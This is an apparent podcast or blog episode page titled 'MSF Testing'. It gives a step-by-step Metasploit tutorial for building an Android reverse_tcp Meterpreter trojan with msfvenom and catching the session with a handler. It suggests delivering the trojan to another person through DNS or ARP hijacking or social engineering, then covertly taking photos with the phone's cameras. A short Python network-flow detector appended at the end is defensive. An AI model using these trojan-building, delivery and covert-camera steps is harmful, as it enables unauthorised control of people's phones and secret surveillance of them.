2 episodes

MSF Testing

Pawan Sharma

    • Technology

    Types of Exploits in Metasploit

    Types of Exploits in Metasploit:

    1) Active

    2) Passive

    > The core difference between these two exploit types is that the active type exploits a specific target before it terminates, whereas the passive type waits until an incoming host connects before exploiting. It helps to know these beforehand, as the difference will play a clearer role when you graduate to writing more complicated exploits.

    - Setup
    The software we will use in this tutorial includes the following:

    1) The exploit: For the purpose of this short guide, we will be using a pre-existing vulnerability in the Freefloat FTP Server.

    2) Immunity Debugger: This is used in creating exploits and reverse-engineering binary files. A good debugger is easy to find online for free.

    3) Windows XP Service Pack 3, installed

    4) Kali Linux: Obviously, the undisputed leading pen testing aid.

    5) Mona.py: A Python-based plugin that helps with debugging in Immunity. Download Mona.py and move it to the Immunity Debugger directory (the PyCommands folder).

    ruforum

    • 1 min
    MSF TESTING

    MSF is the abbreviation of Metasploit. Metasploit is an open source security vulnerability detection tool. It is very powerful. There are Windows and Linux versions. The tool integrates many vulnerabilities announced by Microsoft (0day).

    The system I tested on here is BackBox Linux, a network penetration and information security assessment system with many tools preinstalled, MSF among them. There are of course others, such as Kali Linux and BackTrack.

    Environment: BackBox Linux + MSF

    Target: an Android phone

    Since the target is an Android phone, an Android Trojan horse must be configured first. Then let’s take a look at the IP of the machine.

    🅁🅄🄽 :

    Local IP: 192.168.XZA.XYX

    1) Enter the command in the terminal: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R> /root/apk.apk

    Older versions of MSF used msfpayload to generate Trojans. Newer versions use msfvenom instead, so some readers will get a prompt when they enter msfpayload in the terminal.

    2) If msfpayload reports that the command cannot be found, just use msfvenom. LHOST is the IP address of the machine, LPORT is the port you want to listen on, and the last part is the path where the Trojan is generated.

    3) In this way, we have generated an APK Android Trojan file in the /root/ path. As for making the Trojan evade antivirus, we will leave that aside. Now we start the MSF tool.

    Enter the command: msfconsole

    🦑Then enter:

    4) use exploit/multi/handler (load the module)

    5) set payload android/meterpreter/reverse_tcp (select the payload)

    6) show options (view the parameter settings)

    7) We see that the payload has two parameters to set, LHOST and LPORT, which are the address and the port. The default port is 4444. Now let’s change the settings.

    🅁🅄🄽 :

    1) set LHOST 192.168.1.6 (the address here is the IP address set in the Trojan we just generated)

    2) set LPORT 5555 (the port here is the listening port set in the Trojan we just generated)

    3) exploit (run the module; it starts listening...)

    OK, all preparations are complete. What we have to do now is get the Trojan horse file onto the other party’s mobile phone. There are many ways, such as deception through DNS or ARP hijacking: as long as the other party downloads a file with the mobile phone, it will download our Trojan file.

    4) There is also social engineering and so on. Here I will simply put the Trojan horse file on my own phone for testing.

    5) After the installation is complete, a MainActivity program icon appears on the home screen. This is the Trojan we just generated. When we tap this icon, the phone shows no response, but the Trojan has in fact started to run.

    We can see in our MSF that a session has connected.

    6) In this way, the other party’s mobile phone is controlled by us. To view the mobile phone system information, enter the command sysinfo





    webcam_list: check how many cameras there are on the phone. The two displayed here indicate that there are two cameras, front and rear.

    webcam_snap: hidden camera function

    7) Follow it with the -i parameter to specify which camera takes the picture

    You can see that we took photos of the front and rear cameras and saved them on the desktop

    You can also enter the command webcam_stream to turn on the camera

    enjoy❤️👍🏻
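
A defender's view of the session described above, as an added example that is not part of the original episode notes: with a reverse_tcp payload the phone opens the TCP connection back to the listening machine, so on a lab or home network the flow log shows a phone talking to a LAN peer on an unusual port. The flow-record format, the phone address range and the gateway address are assumptions, and the sample records are constructed.

```python
import ipaddress
from collections import defaultdict

# Constructed sample flow records (assumed format): "time src dst dport proto"
SAMPLE_FLOWS = """\
10:02:11 192.168.1.23 142.250.72.14 443 tcp
10:02:15 192.168.1.23 192.168.1.1 53 udp
10:03:40 192.168.1.23 192.168.1.7 5555 tcp
10:03:41 192.168.1.40 192.168.1.7 22 tcp
10:05:02 192.168.1.31 192.168.1.9 4444 tcp
10:06:30 192.168.1.23 192.168.1.7 5555 tcp
"""

PHONES = ipaddress.ip_network("192.168.1.16/28")  # assumed DHCP range handed to phones
INFRA = {ipaddress.ip_address("192.168.1.1")}     # assumed gateway/DNS, expected peer
HANDLER_DEFAULT_PORT = 4444                       # default handler port named in the text


def suspicious_flows(log_text, phones=PHONES, infra=INFRA):
    """Return phone-initiated TCP flows to LAN peers that are not infrastructure."""
    findings = defaultdict(lambda: {"count": 0, "first_seen": None, "severity": "medium"})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue                      # skip malformed records
        ts, src, dst, dport, proto = parts
        try:
            src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
            port = int(dport)
        except ValueError:
            continue
        if proto != "tcp" or src_ip not in phones:
            continue                      # only TCP sessions opened by a phone
        if not dst_ip.is_private or dst_ip in infra:
            continue                      # internet and gateway traffic is expected
        entry = findings[(src, dst, port)]
        entry["count"] += 1
        entry["first_seen"] = entry["first_seen"] or ts
        if port == HANDLER_DEFAULT_PORT:
            entry["severity"] = "high"    # untouched default listener port
    return dict(findings)


if __name__ == "__main__":
    for flow, info in suspicious_flows(SAMPLE_FLOWS).items():
        print(flow, info)
```

The listening port is freely chosen, so the check keys on the phone-to-LAN-peer direction and uses the port only to raise severity.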

    • 4 min
